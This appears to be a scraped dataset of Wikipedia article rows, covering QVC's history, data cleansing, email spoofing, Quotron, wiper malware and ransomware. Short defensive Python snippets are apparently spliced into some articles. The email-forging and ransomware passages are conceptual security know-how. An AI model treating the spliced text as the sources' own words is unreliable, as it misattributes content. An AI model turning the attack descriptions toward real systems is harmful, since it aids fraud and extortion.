Spanish translation of the network's full name). 32 The operation closed on August 4, 1995, after the devaluation of the Mexican peso during a monetary transition, and a general national loathing of long-form home shopping and paid programming content. 33 On September 29, 1994, QVC Vice President Douglas Briggs unveiled the QVC Local, a customized, $1.7 million state-of-the-art television studio in a bus, in Washington, D.C. 34 In January 1995, QVC kicked off the "Quest for America's Best: 50 in 50 Tour, a 50 week nationwide product search to promote local and regional products with live broadcasts from every State. The QVC Local traveled 88,796 miles of American road during the 50 in 50 Tour in 1995. 35 Comcast and TCI spin-off company Liberty Media completed their acquisition of the company on February 2, 1995, and Diller resigned. Douglas S. Briggs was announced as QVC Inc. CEO on March 6, 1995, after overseeing the daily business of the company as president of QVC electronic retailing and executive vice president of QVC Inc. since February 1994. 36 Briggs was tasked with boosting Diller's many start-up ventures, including QVC UK and Q2. 37 On September 24, 1997, at 7pm ET, QVC signed off their live broadcast from their previous studio and celebrated the opening of their new broadcast center and corporate offices, Studio Park, a nearly 17 acre property with more than 58,000 square feet of filming studios in West Chester, Pennsylvania. 38 39 QVC tested a retail concept in 2000 at The Mall of America in Bloomington, Minnesota with a limited-term lease on a 500 square-foot store. 
40 The next year, QVC signed a ten-year lease on a 2,500 square-foot store with broadcasting capabilities and opened QVC The Mall on August 8, 2001. 41 The Mall of America store remained the only location for this format and the store closed at the conclusion of the ten-year lease on March 22, 2011. 42 In 1998, two former hosts filed a class-action lawsuit against QVC, claiming that they were discriminated against by the shopping channel based on their race. The lawsuit went on to state that QVC refused to allow non-white hosts any permanent daytime primetime spots, which relegated them to the overnight hours, otherwise known as the "graveyard shift. Because of this, the non-white hosts were paid considerably less than the white hosts. 43 44 On July 3, 2003, Comcast sold its majority share to Liberty Media, which purchased the remaining 56.5% of QVC it didn't already own for $7.9 billion. Comcast, for which QVC was a financial asset, not a strategic one, continued to carry QVC for its 21 million cable subscribers. 45 On Wednesday, March 24, 2004, the FTC sued QVC over violating a June 2000 order barring the company from making misleading claims about dietary supplements. 46 A March 2009 settlement with the FTC charged QVC with paying $6 million for consumer redress and a $1.5 million civil penalty and for QVC to discontinue the dietary supplements products. 47 48 In 2006, the U.S. District Court in Philadelphia settled a dispute between QVC and HSN over the use of the phrase "Christmas in July, QVC maintaining their use of it since 1987, and HSN claiming copyright on it in 2000. 49 CEO Douglas Briggs announced his retirement in April 2005 and on November 1, 2005, Michael A. George, who previously served as chief marketing officer and general manager of the U.S. consumer business at Dell Inc, was named successor. George was named QVC CEO on April 15, 2006. 50 On September 23, 2007, QVC U.S. rebranded itself, changing its logo on-air and online. The rebranding was accompanied by an advertising campaign with the tagline "iQdoU? ("I shop QVC, do you? ) that had preceded the rebrand with billboards in major U.S. cities. The iQdoU? campaign also included a "teaser" website. 51 52 On September 30, 2010, at 11 p.m., QVC began broadcasting in Italy, both on satellite and through digital terrestrial television. In 2012, QVC partnered with China National Radio to take over operations of its home shopping network and associated internet e-commerce site, CNR Mall. In 2014 the joint venture reached 89 million households. 53 In 2013, QVC partnered with Ion Media Networks to bring its programming to broadcast television, through Ion Television. 54 QVC began to be carried as the fifth digital subchannel on most Ion Television owned-and-operated stations beginning on August 5, 2013; due to technical limitations caused by the number of subchannels Ion requires its stations to carry, QVC is carried in a squeezed full-screen 4:3 format and is transmitted in standard definition, and the arrangement has since spread to other broadcasters with improvements in multiplexing a number of subchannels. The arrangement also features different on-screen toll-free lines for each station group to allow them to participate in revenue sharing in exchange for the channel space. 55 The broadcast service is branded as "QVC Over the Air", with an accompanying on-screen bug appearing on the lower right corner of the screen during the network's programming. 
After integrating their shopping experience with Facebook in 2008 and with Instagram in 2012, QVC launched toGather, a social shopping platform resembling Pinterest, in July 2013. The site allowed members to set up a personalized newsfeed to view shopping recommendations from people and brands they chose to follow. QVC shut down the site in January 2015. 56 57 On October 21, 2014, QVC returned to the NASDAQ, with trading names QVCA and QVCB. 58 In August 2015, QVC acquired the online retailer Zulily for $2.4 billion. 59 60 On July 6, 2017, QVC's parent company, Liberty Interactive, announced its intention to purchase the remaining 62% of stock it did not already own of HSN, the rival home shopping channel. The all-stock deal was valued at $2.1 billion ($40.36 a share). 61 62 63 In 2018, Liberty Interactive rebranded itself as Qurate Retail Group, trading under the new NASDAQ tickers QRTEA and QRTEB, with Mike George remaining as president and CEO. 64 In 2018, Qurate named Leslie Ferraro as president of their QVC and HSN units. Ferraro concluded her 17-year run at The Walt Disney Company, where she most recently served as co-chair of Disney Consumer Products and Interactive Media and president of Disney Consumer Products, and reported to work at Qurate on September 16. 65 On February 6, 2019, QVC again rebranded itself, with a new square-shaped logo intended to resemble a computer or phone screen, emphasizing its digital and mobile platforms. The reimagined 'Q', in a sleek, mobile-friendly format, has a lever that is supposed to symbolize an open door, said Susan Ripke, QVC's vice president of brand strategy. 66 On Monday, October 7, 2019, QVC ceased its 24/7 live broadcasting model in favor of airing nineteen hours of live and five hours of repeated programming daily. 67 As early as March 16, 2020, QVC saw changes to its operations due to the global COVID-19 pandemic, with on-air product representatives appearing via Skype from around the world, calling in to live broadcasts with program hosts and models practicing social distancing. QVC remained live on-air 20 hours a day, with QVC2 temporarily cutting back to one live hour per day. Employees not essential to the West Chester, Pennsylvania live broadcast shifted to remote work, while all fulfillment centers in Pennsylvania, Virginia, California, and North and South Carolina remained operational with the introduction of health and safety measures and enhanced sanitation practices. 68 Additionally, despite posted revenue gains, Qurate laid off 450 employees in July 2020 "to simplify and streamline its operating structure." 69 Approximately 75% of QVC's 1.2 million-square-foot Rocky Mount, North Carolina distribution center was damaged in a fire on December 18, 2021, which resulted in the death of an employee and the furloughing of the facility's 2,000-person workforce, as QVC chose not to restore operations at the site and sold it off in the spring of 2023. 70 71 On August 22, 2013, QVC launched a timeshift channel called QVC Plus (the first such channel operated by a home shopping network), made available initially on cable provider Bright House Networks and satellite provider DirecTV, which broadcasts the channel's programming on a three-hour tape delay. 72 On April 1, 2017, QVC Plus was rebranded as QVC2 as a destination for more live programming, broadcasting live 12 hours a day, Monday through Friday from noon to midnight ET, and Saturdays and Sundays from 10 am to 10 pm ET.
73 After four months of reduced programming on QVC2 due to the global coronavirus pandemic, QVC2 ceased live programming on July 14, 2020, focusing thereafter only on repeated QVC programming. 74 QVC2 restored live programming with 2 hours live programming daily on December 9, 2020, which increased to 13 hours live daily on July 1, 2021. On April 1, 2019, Beauty iQ's broadcast channel was rebranded as QVC3, airing rebroadcasts of previously recorded QVC and QVC2 programming 24 hours a day. On June 1, 2022, it took over the cable carriage formerly held by ShopHQ's secondary channel, ShopHQ Health. On October 25, 2016, QVC announced the creation of Beauty iQ, a female-oriented television channel based entirely on beauty products. The network was launched on both DirecTV and Dish Network on October 31, 2016. 75 Beauty iQ aired live programming Monday through Friday, 8pm- Midnight ET. Beauty iQ ceased live programming on March 13, 2019. Beginning April 23, 2019, QVC introduced Beauty iQ as their first digital-only channel, in order to better target its younger audience. 76 On March 1, 2021, BeautyiQ converted to QVC NOW, a mix of various repeated QVC programming. All of QVC's operations (U.S., UK, Germany, Japan, Italy, and China) run 24 hours a day, although live programming hours vary between each region. QVC has its headquarters in West Chester, Pennsylvania by U.S. Route 202. 77 78 The $100 million QVC Studio Park complex, located on an 80 acres (32 ha) plot of land, opened in 1997. 79 QVC's U.S. operations are based in the Studio Park complex, which houses its corporate headquarters, studio and broadcasting facilities. Studio Park is the former corporate offices of the computer company Commodore. QVC's distribution centers are located in Lancaster, Pennsylvania, Bethlehem, Pennsylvania, Suffolk, Virginia, Florence, South Carolina, and Ontario, California. Its 2013 sales were worth $5.84 billion. 80 Call center facilities were located in San Antonio, Texas and Chesapeake, Virginia, though both closed after call center employees permanently transitioned to remote work during the COVID 19 pandemic in 2020. A call center in Port St. Lucie, Florida was also in operation until 2016. 81 QVC U.S. also operates two outlet stores in Lancaster, Pennsylvania and Frazer, Pennsylvania. 82 QVC broadcasts live in the United States 20 7. The four hours from 3am until 7am Eastern time, loop the "Today's Special Value" feature for Pacific Time Zone viewers, and previously aired programming. QVC broadcasts 364 days a year to more than 100 million households, and ranks as the number two television network in terms of revenue ( 1 in home shopping networks), with sales in 2015 giving a net revenue of $8.7 billion. The only day on which QVC does not broadcast its usual format is Christmas, when the station runs a taped telecast of the West Chester Christmas Parade and other pre-recorded programming. 83 54 Every year the "QVC Presents 'FFANY Shoes on Sale' event is broadcast in which donated designer shoes are sold at half the suggested retail price and 80% of the proceeds go to breast cancer research and education. It is organized with the Fashion Footwear Association of New York, which runs a coinciding Shoes on Sale initiative along with an awards gala. 84 85 86 87 QVC UK was launched on October 1, 1993. QVC UK's headquarters and broadcasting facilities are in Chiswick Park, West London. Call centre and distribution warehouse are situated in Knowsley in Merseyside. 
QVC UK also runs an outlet store in Warrington; another was in Shrewsbury, but this closed in June 2020. QVC UK also operates three channels made up mostly of rerun segments from the live channel: QVC Beauty, QVC Extra and QVC Style. The company's UK sales in 2013 were worth $660 million, now reaching 27 million households in Britain and Ireland. 53 80 QVC UK's main channel broadcasts live 364 days a year from 09:00 to 01:00. For the 8 'non-live' hours a day and on one day a year, Christmas Day, the main channel shows rerun segments from the live channel. QVC Germany, incorporated in Düsseldorf, runs call centre operations from sites in Bochum and Kassel, whilst distribution is handled from a dedicated warehouse in Hückelhoven. The company's 2013 sales were worth $970 million. 80 QVC Germany first broadcast on December 1, 1996, and reaches 41 million households in Germany and Austria. 53 QVC Germany broadcasts live 17 hours a day, 363.5 days a year (the channel goes off-air after noon on Christmas Eve and all of Christmas Day). QVC has two additional channels in Germany, QVC 2 and QVC Style. QVC Japan, a joint venture with Mitsui & Co., is based in Makuhari, where its broadcast studio, corporate headquarters, and call center facility are located. Distribution facilities are in Sakura City. The company's 2013 sales were worth $1.02 billion. 80 QVC Japan first broadcast on April 1, 2001, and reaches 27 million households. The channel once broadcast live programming 24 hours a day and now airs 19 live programming hours daily. 53 QVC Italy first broadcast on October 1, 2010. 88 QVC Italy's headquarters and broadcasting facilities are located at Brugherio, near Milan, and the distribution center is located in Castel San Giovanni. 53 The company's 2013 sales were worth $130 million. 80 QVC Italy broadcasts live 17 hours a day (although the channel runs 24 hours a day), 364 days a year to 25 million households. The primary distribution platforms for QVC Italy are digital terrestrial television and satellite. On August 1, 2015, QVC reached its seventh international market with France. 53 89 Before the launch, the company said it expected to create about 200 jobs in its first two years in the country. QVC France broadcast from their studio and administration facility in Seine-Saint-Denis live on weekdays from 15:00 to 23:00 and weekends from 11:00 to 23:00, online, on mobile devices and on major satellite TV, cable TV and internet TV. 90 The channel's corporate website said QVC stood for Qualité, Valeur, Confiance, replacing convenience with (the French for) trust. 80 Qurate Retail Group ceased operations of QVC France on March 13, 2019, stating that "QVC France had underperformed against financial and operational expectations, in large part due to unique in-market structural challenges and market dynamics that evolved in the years following the launch of the operation." 91 QVC CNR (China) is based in Beijing and operates both a television broadcast and an associated e-commerce website, cnrmall.com. The China operation is a 51/49 joint venture between state-owned China National Radio and QVC, based on the pre-existing CNR channel reaching 35 million households, with plans to grow to 195 million households that have digital cable. 92 Chinese law prohibits private control of television stations, so this is the maximum position QVC can hold in its Chinese operations. QVC CNR broadcasts live 17 hours a day. 53 The company's 2013 sales were worth $110 million.
80 Since August 11, 1987, QVC has branded their daily featured product as Today's Special Value. Originally, Today's Special Value (TSV) was a product specially priced for one day only, but since 2017, contrary to its name, it is offered for a variable amount of time, for up to two weeks. 93 |
59 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_cleansing | Data cleansing or data cleaning is the process of detecting and correcting (or removing) corrupt or inaccurate records from a record set, table, or database and refers to identifying incomplete, incorrect, inaccurate or irrelevant parts of the data and then replacing, modifying, or deleting the dirty or coarse data. 1 Data cleansing may be performed interactively with data wrangling tools, or as batch processing through scripting or a data quality firewall. After cleansing, a data set should be consistent with other similar data sets in the system. The inconsistencies detected or removed may have been originally caused by user entry errors, by corruption in transmission or storage, or by different data dictionary definitions of similar entities in different stores. Data cleaning differs from data validation in that validation almost invariably means data is rejected from the system at entry and is performed at the time of entry, rather than on batches of data. The actual process of data cleansing may involve removing typographical errors or validating and correcting values against a known list of entities. The validation may be strict (such as rejecting any address that does not have a valid postal code), or with fuzzy or approximate string matching (such as correcting records that partially match existing, known records). Some data cleansing solutions will clean data by cross-checking with a validated data set. A common data cleansing practice is data enhancement, where data is made more complete by adding related information. For example, appending addresses with any phone numbers related to that address. Data cleansing may also involve harmonization (or normalization) of data, which is the process of bringing together data of "varying file formats, naming conventions, and columns", 2 and transforming it into one cohesive data set; a simple example is the expansion of abbreviations ("st, rd, etc. to "street, road, etcetera"). Administratively incorrect, inconsistent data can lead to false conclusions and misdirect investments on both public and private scales. For instance, the government may want to analyze population census figures to decide which regions require further spending and investment on infrastructure and services. In this case, it will be important to have access to reliable data to avoid erroneous fiscal decisions. In the business world, incorrect data can be costly. Many companies use customer information databases that record data like contact information, addresses, and preferences. For instance, if the addresses are inconsistent, the company will suffer the cost of resending mail or even losing customers. High-quality data needs to pass a set of quality criteria. Those include: The term integrity encompasses accuracy, consistency and some aspects of validation (see also data integrity) but is rarely used by itself in data-cleansing contexts because it is insufficiently specific. (For example, "referential integrity" is a term used to refer to the enforcement of foreign-key constraints above.) Good quality source data has to do with “Data Quality Culture” and must be initiated at the top of the organization. It is not just a matter of implementing strong validation checks on input screens, because almost no matter how strong these checks are, they can often still be circumvented by the users. 
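A minimal pandas sketch of the validation and harmonization steps just described; the column names, the five-digit postal-code rule, and the abbreviation map are assumptions chosen for illustration, not a general-purpose cleanser.
import pandas as pd
df = pd.DataFrame({
    "address": ["12 Main st", "9 Oak rd", "Elm street 4"],
    "postal_code": ["19380", "ABCDE", "19104"],
})
# Strict validation: a US-style five-digit postal code (illustrative rule)
df["postal_valid"] = df["postal_code"].str.fullmatch(r"\d{5}")
# Harmonization: expand common abbreviations into one consistent form
abbrev = {r"\bst\b": "street", r"\brd\b": "road"}
df["address_clean"] = df["address"].str.lower().replace(abbrev, regex=True)
print(df)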
There is a nine-step guide for organizations that wish to improve data quality: 3 4 Others include: The essential job of this system is to find a suitable balance between fixing dirty data and keeping the data as close as possible to the original data from the source production system. This is a challenge for the extract, transform, load (ETL) architect. The system should offer an architecture that can cleanse data, record quality events, and measure and control the quality of data in the data warehouse. A good start is to perform a thorough data profiling analysis that will help define the required complexity of the data cleansing system and also give an idea of the current data quality in the source system(s). Part of the data cleansing system is a set of diagnostic filters known as quality screens. Each screen implements a test in the data flow that, if it fails, records an error in the error event schema. Quality screens are divided into three categories: When a quality screen records an error, it can either stop the dataflow process, send the faulty data somewhere other than the target system, or tag the data. The latter option is considered the best solution, because the first option requires that someone manually deal with the issue each time it occurs, and the second implies that data are missing from the target system (integrity) and it is often unclear what should happen to these data. Most data cleansing tools have limitations in usability: The error event schema holds records of all error events thrown by the quality screens. It consists of an error event fact table with foreign keys to three dimension tables that represent date (when), batch job (where) and screen (which screen produced the error). It also holds information about exactly when the error occurred and the severity of the error. Also, there is an error event detail fact table with a foreign key to the main table that contains detailed information about the table, record and field in which the error occurred, and the error condition. |
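The quality-screen and error-event ideas above can be sketched in a few lines of pandas: each screen is a test over a batch of data, and every failure appends a row to an error-event table instead of silently dropping the record. The column names and the age rule are hypothetical.
import pandas as pd
from datetime import datetime, timezone
batch = pd.DataFrame({"customer_id": [1, 2, 3], "age": [34, -5, 210]})
error_events = []   # stands in for the error event schema / fact table
def column_screen(df, column, rule, description):
    """Tag rows that fail a rule and record one error event per failure."""
    failed = ~df[column].apply(rule)
    for idx in df.index[failed]:
        error_events.append({
            "when": datetime.now(timezone.utc).isoformat(),
            "screen": description,
            "row": int(idx),
            "value": df.at[idx, column],
        })
    return df.assign(**{f"{column}_ok": ~failed})
checked = column_screen(batch, "age", lambda a: 0 <= a <= 120, "age out of range")
print(checked)
print(pd.DataFrame(error_events))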
60 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Email_spoofing | Email spoofing is the creation of email messages with a forged sender address. 1 The term applies to email purporting to be from an address which is not actually the sender's; mail sent in reply to that address may bounce or be delivered to an unrelated party whose identity has been faked. Disposable email address or "masked" email is a different topic, providing a masked email address that is not the user's normal address, which is not disclosed (for example, so that it cannot be harvested), but forwards mail sent to it to the user's real address. 2 The original transmission protocols used for email do not have built-in authentication methods: this deficiency allows spam and phishing emails to use spoofing in order to mislead the recipient. More recent countermeasures have made such spoofing from internet sources more difficult but they have not eliminated it completely; few internal networks have defences against a spoof email from a colleague's compromised computer on that network. Individuals and businesses deceived by spoof emails may suffer significant financial losses; in particular, spoofed emails are often used to infect computers with ransomware. When a Simple Mail Transfer Protocol (SMTP) email is sent, the initial connection provides two pieces of address information: Together, these are sometimes referred to as the "envelope" addressing an analogy to a traditional paper envelope. 3 Unless the receiving mail server signals that it has problems with either of these items, the sending system sends the "DATA" command, and typically sends several header items, including: The result is that the email recipient sees the email as having come from the address in the From: header. They may sometimes be able to find the MAIL FROM address, and if they reply to the email, it will go to either the address presented in the From: or Reply-to: header, but none of these addresses are typically reliable, 4 so automated bounce messages may generate backscatter. Although email spoofing is effective in forging the email address, the IP address of the computer sending the mail can generally be identified from the "Received: lines in the email header. 5 In malicious cases, however, this is likely to be the computer of an innocent third party infected by malware that is sending the email without the owner's knowledge. Phishing and business email compromise scams generally involve an element of email spoofing. Email spoofing has been responsible for public incidents with serious business and financial consequences. This was the case in an October 2013 email to a news agency which was spoofed to look as if it was from the Swedish company Fingerprint Cards. The email stated that Samsung offered to purchase the company. The news spread and the stock exchange rate surged by 50%. 6 Malware such as Klez and Sober among many more modern examples often search for email addresses within the computer they have infected, and they use those addresses both as targets for email, and also to create credible forged From fields in the emails that they send. citation needed This is to ensure that the emails are more likely to be opened. For example: In this case, even if Bob's system detects the incoming mail as containing malware, he sees the source as being Charlie, even though it really came from Alice's computer. 
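To make the header-versus-envelope distinction above concrete, the sketch below parses a raw message with Python's standard email module and flags a mismatch between the From: header domain and the Return-Path header (which normally records the envelope MAIL FROM). The sample message is fabricated, and real mail filters combine this kind of check with SPF, DKIM and DMARC.
from email import message_from_string
from email.utils import parseaddr
raw = """Return-Path: <bounce@mailer.example.net>
From: "Support" <support@bank.example.com>
To: bob@example.org
Subject: Please verify your account

(body omitted)
"""
msg = message_from_string(raw)
def domain(header_value):
    # Extract the domain part of an address header, if any
    addr = parseaddr(header_value or "")[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
from_dom = domain(msg["From"])
envelope_dom = domain(msg["Return-Path"])
if from_dom and envelope_dom and from_dom != envelope_dom:
    print(f"Suspicious: From domain {from_dom!r} != envelope domain {envelope_dom!r}")
else:
    print("Header and envelope domains agree")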
Meanwhile, Alice may remain unaware that her computer has been infected, and Charlie does not know anything about it at all, unless he receives an error message from Bob. Traditionally, mail servers could accept a mail item, then later send a Non-Delivery Report or "bounce" message if it could not be delivered or had been quarantined for any reason. These would be sent to the "MAIL FROM: a.k.a. "Return Path" address. With the massive rise in forged addresses, best practice is now to not generate NDRs for detected spam, viruses etc. 7 but to reject the email during the SMTP transaction. When mail administrators fail to take this approach, their systems are guilty of sending "backscatter" emails to innocent parties in itself a form of spam or being used to perform "Joe job" attacks. The SSL TLS system used to encrypt server-to-server email traffic can also be used to enforce authentication, but in practice it is seldom used, 8 and a range of other potential solutions have also failed to gain traction. A number of defensive systems have come into wide use, including: To effectively stop forged email being delivered, the sending domains, their mail servers, and the receiving system all need to be configured correctly for these higher standards of authentication. Although their use is increasing, estimates vary widely as to what percentage of emails have no form of domain authentication: from 8.6% 10 to "almost half". 11 12 13 For this reason, receiving mail systems typically have a range of settings to configure how they treat poorly-configured domains or email. 14 15 While there has been research into improving email security, little emphasis has been placed on informing users whose email addresses have been used for spoofing. Currently, only the email recipient can identify a fake email, and users whose addresses are spoofed remain unaware unless the recipient manually scrutinizes the message. citation needed Business email compromise attacks are a class of cyber crime which use email fraud to attack organizations. Examples include invoice scams and spear-phishing attacks which are designed to gather data for other criminal activities. A business deceived by an email spoof can suffer additional financial, business continuity and reputational damage. Fake emails can also be used to spread malware. Typically, an attack targets specific employee roles within an organization by sending spoof emails which fraudulently represent a senior colleague, trusted customer, or supplier. 16 (This type of attack is known as spear phishing). The email will issue instructions, such as approving payments or releasing client data. The emails often use social engineering to trick the victim into making money transfers to the bank account of the fraudster. 17 The United States' Federal Bureau of Investigation recorded $26 billion of US and international losses associated with BEC attacks between June 2016 and July 2019. 18 More recent figures estimate losses of over $50 billion from 2013 to 2022. 19 |
61 | https://en.wikipedia.org/wiki/Web_scraping | https://id.wikipedia.org/wiki/Menggali_web | Web scraping is an activity carried out to extract specific, semi-structured data from a web page. Such pages are generally built with a markup language such as HTML or XHTML, and the process analyzes the document before it begins extracting data. Scraping techniques are usually implemented in a bot so that a process that would otherwise be done manually becomes automated. When we encounter a site that limits its API (application programming interface) quota, or does not provide an API at all, web crawling becomes essential as a way to collect the data. |
62 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=history | For any version listed below, click on its date to view it. For more help, see Help:Page history and Help:Edit summary. (cur) difference from current version, (prev) difference from preceding version, m minor edit, section edit, automatic edit summary |
63 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Quotron | Quotron was a Los Angeles-based company that in 1960 became the first financial data technology company to deliver stock market quotes to an electronic screen rather than on a printed ticker tape. The Quotron offered brokers and money managers up-to-the-minute prices and other information about securities. 1 The Quotron was developed by Scantlin Electronics, owned by entrepreneur John Scantlin. Scantlin had earlier developed a quotation device that used magnetic tape instead of ticker tape. 2 Quotron's first major competitor was Telerate, which was founded by Neil Hirsch in 1969 and later bought by Dow Jones in 1990. 3 Citicorp bought Quotron in 1986. At the time, Quotron was renting 100,000 terminals, which equated to 60 percent of the 1986 market for financial data. 4 Following the Citicorp acquisition, Quotron's largest client, brokerage house Merrill Lynch, decided not to renew its contract with Quotron. Merrill Lynch instead invested in a competing startup named Bloomberg. Most computer screens in the 1980s were able to display text in a single color. Quotron screens had green text on a black background. The Quotron was the screen used by Charlie Sheen's Bud Fox and Michael Douglas's Gordon Gekko characters in the 1987 movie Wall Street. 5 When the Bloomberg professional terminal launched for bond traders, it had amber text on a black background. Quotron did not keep pace with developments in technology, and the company was slow to move from a dedicated terminal to personal computers as the proprietary Bloomberg Terminal overtook its market share. By 1994, Quotron had only 35,000 terminals, compared with 80,000 for Automatic Data Processing and 25,000 for ILX, according to Waters Information Services. Citicorp lost money on Quotron every year and, in 1994, paid Reuters Holdings P.L.C. more than $100 million to purchase the ailing Quotron. Quotron then became Reuters' trading floor terminal, until it was superseded by the Reuters 3000 Xtra and Triarch platform. Thomson Reuters and Bloomberg lead the trading floor terminal space today with 70% of the market. 1 In early 2023, Quotron was revitalized by a group of tech entrepreneurs who have started developing modern stock tickers for individual traders. 6 |
64 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wiper_(malware) | In computer security, a wiper is a class of malware intended to erase (wipe, hence the name) the hard drive or other static memory of the computer it infects, maliciously deleting data and programs. A piece of malware referred to as "Wiper" was allegedly used in attacks against Iranian oil companies. In 2012, the International Telecommunication Union supplied Kaspersky Lab with hard drives allegedly damaged by Wiper for analysis. While a sample of the alleged malware could not be found, Kaspersky discovered traces of a separate piece of malware known as Flame. 1 2 3 The Shamoon malware contained a disk wiping mechanism; it was employed in 2012 and 2016 malware attacks targeting Saudi energy companies, and utilized a commercial direct drive access driver known as Rawdisk. The original variant overwrote files with portions of an image of a burning U.S. flag. The 2016 variant was nearly identical, except using an image of the body of Alan Kurdi instead. 4 5 A wiping component was used as part of the malware employed by the Lazarus Group—a cybercrime group with alleged ties to North Korea, during the 2013 South Korea cyberattack, and the 2014 Sony Pictures hack. 6 7 8 The Sony hack also utilized RawDisk. 4 In 2017, computers in several countries—most prominently Ukraine, were infected by NotPetya, which is a variant of the Petya ransomware that was a wiper in functional sense. The malware infects the master boot record with a payload that encrypts the internal file table of the NTFS file system. Although it still demanded a ransom, it was found that the code had been significantly modified so that the payload could not actually revert its changes, even if the ransom were successfully paid. 9 10 Several variants of wiper malware were discovered during the 2022 Ukraine cyberattacks on computer systems associated with Ukraine. Named CaddyWiper, HermeticWiper, IsaacWiper, and FoxBlade by researchers, the programs showed little relation to each other, prompting speculation that they were created by different state-sponsored actors in Russia especially for this occasion. 11 Reactive redundancy is a possible solution for data destruction protection. Researchers are able to create systems capable of analyzing write buffers before they reach a storage medium, determine if the write is destructive, and preserve the data under destruction. 12 |
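As a rough illustration of the "determine if the write is destructive" idea mentioned above: encrypted or wiped data tends to look random, so its byte entropy approaches the maximum of 8 bits per byte. The sketch below only scores a buffer that is already in memory; a real reactive-redundancy system would hook the write path itself, and the 7.5-bit threshold is an assumption for demonstration.
import math
import os
from collections import Counter
def shannon_entropy(data):
    """Bits of entropy per byte (0.0 for a constant buffer, about 8.0 for random data)."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())
def looks_destructive(buffer, threshold=7.5):
    # Heuristic only: high-entropy overwrites resemble encryption or random wiping.
    return shannon_entropy(buffer) > threshold
print(looks_destructive(b"hello world " * 100))   # low entropy -> False
print(looks_destructive(os.urandom(4096)))        # near-random -> True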
65 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Ransomware | Ransomware is a type of cryptovirological malware that permanently blocks access to the victim's personal data unless a "ransom" is paid. While some simple ransomware may lock the system without damaging any files, more advanced malware uses a technique called cryptoviral extortion. It encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. 1 2 3 4 5 In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem, and difficult-to-trace digital currencies such as paysafecard or Bitcoin and other cryptocurrencies are used for the ransoms, making tracing and prosecuting the perpetrators difficult. Ransomware attacks are typically carried out using a Trojan disguised as a legitimate file that the user is tricked into downloading or opening when it arrives as an email attachment. However, one high-profile example, the WannaCry worm, traveled automatically between computers without user interaction. 6 Starting as early as 1989 with the first documented ransomware known as the AIDS trojan, the use of ransomware scams has grown internationally. 7 8 9 There were 181.5 million ransomware attacks in the first six months of 2018. This record marks a 229% increase over this same time frame in 2017. 10 In June 2014, vendor McAfee released data showing that it had collected more than double the number of ransomware samples that quarter than it had in the same quarter the previous year. 11 CryptoLocker was particularly successful, procuring an estimated US$3 million before it was taken down by authorities, 12 and CryptoWall was estimated by the US Federal Bureau of Investigation (FBI) to have accrued over US$18 million by June 2015. 13 In 2020, the IC3 received 2,474 complaints identified as ransomware with adjusted losses of over $29.1 million. The losses could be more than that, according to the FBI. 14 Globally, according to Statistica, there were about 623 million ransomware attacks in 2021, and 493 million in 2022. 15 The concept of file-encrypting ransomware was invented and implemented by Young and Yung at Columbia University and was presented at the 1996 IEEE Security Privacy conference. It is called cryptoviral extortion and it was inspired by the fictional facehugger in the movie Alien. 16 Cryptoviral extortion is the following three-round protocol carried out between the attacker and the victim. 1 The symmetric key is randomly generated and will not assist other victims. At no point is the attacker's private key exposed to victims and the victim need only send a very small ciphertext (the encrypted symmetric-cipher key) to the attacker. Ransomware attacks are typically carried out using a Trojan, entering a system through, for example, a malicious attachment, embedded link in a phishing email, or a vulnerability in a network service. The program then runs a payload, which locks the system in some fashion, or claims to lock the system but does not (e.g., a scareware program). Payloads may display a fake warning purportedly by an entity such as a law enforcement agency, falsely claiming that the system has been used for illegal activities, contains content such as pornography and "pirated" media. 
17 18 19 Some payloads consist simply of an application designed to lock or restrict the system until payment is made, typically by setting the Windows Shell to itself, 20 or even modifying the master boot record and or partition table to prevent the operating system from booting until it is repaired. 21 The most sophisticated payloads encrypt files, with many using strong encryption to encrypt the victim's files in such a way that only the malware author has the needed decryption key. 1 22 23 Payment is virtually always the goal, and the victim is coerced into paying for the ransomware to be removed either by supplying a program that can decrypt the files, or by sending an unlock code that undoes the payload's changes. While the attacker may simply take the money without returning the victim's files, it is in the attacker's best interest to perform the decryption as agreed, since victims will stop sending payments if it becomes known that they serve no purpose. A key element in making ransomware work for the attacker is a convenient payment system that is hard to trace. A range of such payment methods have been used, including wire transfers, premium-rate text messages, 24 pre-paid voucher services such as paysafecard, 7 25 26 and the Bitcoin cryptocurrency. 27 28 29 In May 2020, vendor Sophos reported that the global average cost to remediate a ransomware attack (considering downtime, people time, device cost, network cost, lost opportunity and ransom paid) was $761,106. Ninety-five percent of organizations that paid the ransom had their data restored. 30 The first known malware extortion attack, the "AIDS Trojan" written by Joseph Popp in 1989, had a design failure so severe it was not necessary to pay the extortionist at all. Its payload hid the files on the hard drive and encrypted only their names, and displayed a message claiming that the user's license to use a certain piece of software had expired. The user was asked to pay US$189 to "PC Cyborg Corporation" in order to obtain a repair tool even though the decryption key could be extracted from the code of the Trojan. The Trojan was also known as "PC Cyborg". Popp was declared mentally unfit to stand trial for his actions, but he promised to donate the profits from the malware to fund AIDS research. 31 The idea of abusing anonymous cash systems to safely collect ransom from human kidnapping was introduced in 1992 by Sebastiaan von Solms and David Naccache. 32 This electronic money collection method was also proposed for cryptoviral extortion attacks. 1 In the von Solms-Naccache scenario a newspaper publication was used (since bitcoin ledgers did not exist at the time the paper was written). The notion of using public key cryptography for data kidnapping attacks was introduced in 1996 by Adam L. Young and Moti Yung. Young and Yung critiqued the failed AIDS Information Trojan that relied on symmetric cryptography alone, the fatal flaw being that the decryption key could be extracted from the Trojan, and implemented an experimental proof-of-concept cryptovirus on a Macintosh SE 30 that used RSA and the Tiny Encryption Algorithm (TEA) to hybrid encrypt the victim's data. Since public key cryptography is used, the virus only contains the encryption key. The attacker keeps the corresponding private decryption key private. Young and Yung's original experimental cryptovirus had the victim send the asymmetric ciphertext to the attacker who deciphers it and returns the symmetric decryption key it contains to the victim for a fee. 
